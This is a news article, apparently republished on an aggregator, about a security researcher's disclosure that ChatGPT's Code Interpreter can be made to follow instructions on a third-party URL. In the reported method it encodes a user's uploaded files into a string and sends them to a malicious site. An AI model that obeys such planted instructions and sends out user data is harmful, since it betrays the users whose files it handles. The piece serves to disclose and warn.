Get all your news in one place.
100’s of premium titles.
One app.
Start reading
Windows Central
Windows Central
Technology
Kevin Okemwa

ChatGPT's new code interpreting tool could become a hacker's paradise. Here's how.

ChatGPT privacy settings.

What you need to know

  • ChatGPT Plus members can now access a code interpreting tool with sophisticated coding capabilities, including writing Python code by leveraging AI capabilities and running it in a sandboxed environment.
  • A security expert has disclosed that the new feature potentially poses a significant security threat to users.
  • Running the code in a sandbox environment heightens the chances of hackers maliciously accessing your data.
  • The technique involves tricking ChatGPT into executing instructions from a third-party URL, prompting it to encode uploaded files into a string, and sending this information to a malicious site. 

For a while now, we've known ChatGPT can achieve incredible things and make work easier for users, from developing software in under 7 minutes to solving complex math problems and more. While it's already possible to write code using the tool, OpenAI recently debuted a new Code Interpreter tool, making the process more seamless.

According to Tom's Hardware and cybersecurity expert Johann Rehberger, the tool writes Python code by leveraging AI capabilities and even runs it in a sandboxed environment. And while this is an incredible feat, the sandboxed environment bit is a hornet's nest bred with attackers. 

This is mainly because it's also used to handle any spreadsheets. You might need ChatGPT to analyze and present the data in the form of charts, ultimately making it susceptible to malicious ploys by hackers.

How do hackers leverage this vulnerability?

Per Johann Rehberger's findings and Tom's Hardware's in-depth tests and analysis, the technique involves duping the AI-powered chatbot into executing instructions from a third-party URL. This allows it to encode uploaded files into a string that sends the information to a malicious site. 

This is highly concerning even though this technique calls for particular conditions. You'll also require a ChatGPT Plus subscription to access the code-interpreting tool.

RELATED: OpenAI temporarily restricts new sign-ups for its ChatGPT Plus service

While running tests and trying to replicate this technique, Tom's Hardware tried to determine the extent of this vulnerability by creating a fake environment variables file and leveraging ChatGPT's capabilities to process and send this data to an external malicious site.

Considering this, the uploads are initiated on a new Linux virtual machine with a dedicated directory structure. While ChatGPT might not provide a command line, it responds to Linux commands, thus allowing users to access the information and files. Through this avenue, hackers can manage to access unsuspecting users' data.

Is it possible to completely block hackers from leveraging AI capabilities to deploy attacks on unsuspecting users? Please share your thoughts with us in the comments. 

Sign up to read this article
Read news from 100’s of titles, curated specifically for you.
Already a member? Sign in here
Related Stories
Top stories on inkl right now
Our Picks
Fourteen days free
Download the app
One app. One membership.
100+ trusted global sources.